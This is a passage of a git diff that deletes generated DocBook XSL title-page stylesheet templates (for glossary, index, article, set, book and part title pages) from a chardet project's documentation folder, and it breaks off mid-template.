param:node="ancestor-or-self::bibliography[1]"/> - <subtitle/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="glossary" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title - t:force="1" - t:named-template="component.title" - param:node="ancestor-or-self::glossary[1]"/> - <subtitle/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="index" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title - t:force="1" - t:named-template="component.title" - param:node="ancestor-or-self::index[1]"/> - <subtitle/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -<t:titlepage t:element="setindex" t:wrapper="div" class="titlepage"> - <t:titlepage-content t:side="recto"> - <title - t:force="1" - t:named-template="component.title" - param:node="ancestor-or-self::setindex[1]"/> - <subtitle/> - </t:titlepage-content> - - <t:titlepage-content t:side="verso"> - </t:titlepage-content> - - <t:titlepage-separator> - </t:titlepage-separator> - - <t:titlepage-before t:side="recto"> - </t:titlepage-before> - - <t:titlepage-before t:side="verso"> - </t:titlepage-before> -</t:titlepage> - -<!-- ==================================================================== --> - -</t:templates> diff --git a/chardet/docs/docbook/xsl/html/titlepage.templates.xsl b/chardet/docs/docbook/xsl/html/titlepage.templates.xsl deleted file mode 100644 index 91d1480..0000000 --- a/chardet/docs/docbook/xsl/html/titlepage.templates.xsl +++ /dev/null @@ -1,3152 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?><xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"> - -<!-- This stylesheet was created by template/titlepage.xsl; do not edit it by hand. --> - -<xsl:template name="article.titlepage.recto"> - <xsl:choose> - <xsl:when test="articleinfo/title"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/title"/> - </xsl:when> - <xsl:when test="artheader/title"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="articleinfo/subtitle"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/subtitle"/> - </xsl:when> - <xsl:when test="artheader/subtitle"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/corpauthor"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/corpauthor"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/authorgroup"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/authorgroup"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/author"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/author"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/othercredit"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/othercredit"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/releaseinfo"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/releaseinfo"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/copyright"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/copyright"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/legalnotice"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/legalnotice"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/pubdate"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/pubdate"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/revision"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/revision"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/revhistory"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/revhistory"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/abstract"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/abstract"/> - <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="article.titlepage.verso"> -</xsl:template> - -<xsl:template name="article.titlepage.separator"><hr/> -</xsl:template> - -<xsl:template name="article.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="article.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="article.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="article.titlepage.before.recto"/> - <xsl:call-template name="article.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="article.titlepage.before.verso"/> - <xsl:call-template name="article.titlepage.verso"/> - </div> - <xsl:call-template name="article.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="article.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="article.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="article.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="article.titlepage.recto.style"> -<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="set.titlepage.recto"> - <xsl:choose> - <xsl:when test="setinfo/title"> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="setinfo/subtitle"> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/corpauthor"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/authorgroup"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/author"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/othercredit"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/releaseinfo"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/copyright"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/legalnotice"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/pubdate"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/revision"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/revhistory"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/abstract"/> - <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="set.titlepage.verso"> -</xsl:template> - -<xsl:template name="set.titlepage.separator"><hr/> -</xsl:template> - -<xsl:template name="set.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="set.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="set.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="set.titlepage.before.recto"/> - <xsl:call-template name="set.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="set.titlepage.before.verso"/> - <xsl:call-template name="set.titlepage.verso"/> - </div> - <xsl:call-template name="set.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="set.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="set.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="set.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="set.titlepage.recto.style"> -<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="book.titlepage.recto"> - <xsl:choose> - <xsl:when test="bookinfo/title"> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="bookinfo/subtitle"> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/corpauthor"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/authorgroup"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/author"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/othercredit"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/releaseinfo"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/copyright"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/legalnotice"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/pubdate"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/revision"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/revhistory"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/abstract"/> - <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="book.titlepage.verso"> -</xsl:template> - -<xsl:template name="book.titlepage.separator"><hr/> -</xsl:template> - -<xsl:template name="book.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="book.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="book.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="book.titlepage.before.recto"/> - <xsl:call-template name="book.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="book.titlepage.before.verso"/> - <xsl:call-template name="book.titlepage.verso"/> - </div> - <xsl:call-template name="book.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="book.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="book.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="legalnotice" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="pubdate" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revision" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="revhistory" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="abstract" mode="book.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="book.titlepage.recto.style"> -<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template name="part.titlepage.recto"> - <xsl:choose> - <xsl:when test="partinfo/title"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/title"/> - </xsl:when> - <xsl:when test="docinfo/title"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/title"/> - </xsl:when> - <xsl:when test="info/title"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/title"/> - </xsl:when> - <xsl:when test="title"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="title"/> - </xsl:when> - </xsl:choose> - - <xsl:choose> - <xsl:when test="partinfo/subtitle"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/subtitle"/> - </xsl:when> - <xsl:when test="docinfo/subtitle"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/subtitle"/> - </xsl:when> - <xsl:when test="info/subtitle"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/subtitle"/> - </xsl:when> - <xsl:when test="subtitle"> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="subtitle"/> - </xsl:when> - </xsl:choose> - - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/corpauthor"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/corpauthor"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/corpauthor"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/authorgroup"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/authorgroup"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/authorgroup"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/author"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/author"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/author"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/othercredit"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/othercredit"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/othercredit"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/releaseinfo"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/releaseinfo"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/copyright"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/copyright"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/copyright"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/legalnotice"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/legalnotice"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/legalnotice"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/pubdate"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/pubdate"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/pubdate"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/revision"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/revision"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/revision"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/revhistory"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/revhistory"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/revhistory"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/abstract"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/abstract"/> - <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/abstract"/> -</xsl:template> - -<xsl:template name="part.titlepage.verso"> -</xsl:template> - -<xsl:template name="part.titlepage.separator"> -</xsl:template> - -<xsl:template name="part.titlepage.before.recto"> -</xsl:template> - -<xsl:template name="part.titlepage.before.verso"> -</xsl:template> - -<xsl:template name="part.titlepage"> - <div class="titlepage"> - <div> - <xsl:call-template name="part.titlepage.before.recto"/> - <xsl:call-template name="part.titlepage.recto"/> - </div> - <div> - <xsl:call-template name="part.titlepage.before.verso"/> - <xsl:call-template name="part.titlepage.verso"/> - </div> - <xsl:call-template name="part.titlepage.separator"/> - </div> -</xsl:template> - -<xsl:template match="*" mode="part.titlepage.recto.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="*" mode="part.titlepage.verso.mode"> - <!-- if an element isn't found in this mode, --> - <!-- try the generic titlepage.mode --> - <xsl:apply-templates select="." mode="titlepage.mode"/> -</xsl:template> - -<xsl:template match="title" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="subtitle" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="corpauthor" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="authorgroup" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="author" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="othercredit" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="releaseinfo" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/> -</div> -</xsl:template> - -<xsl:template match="copyright" mode="part.titlepage.recto.auto.mode"> -<div xsl:use-attribute-sets="part.titlepage.recto.style"> -<xsl:apply-templates 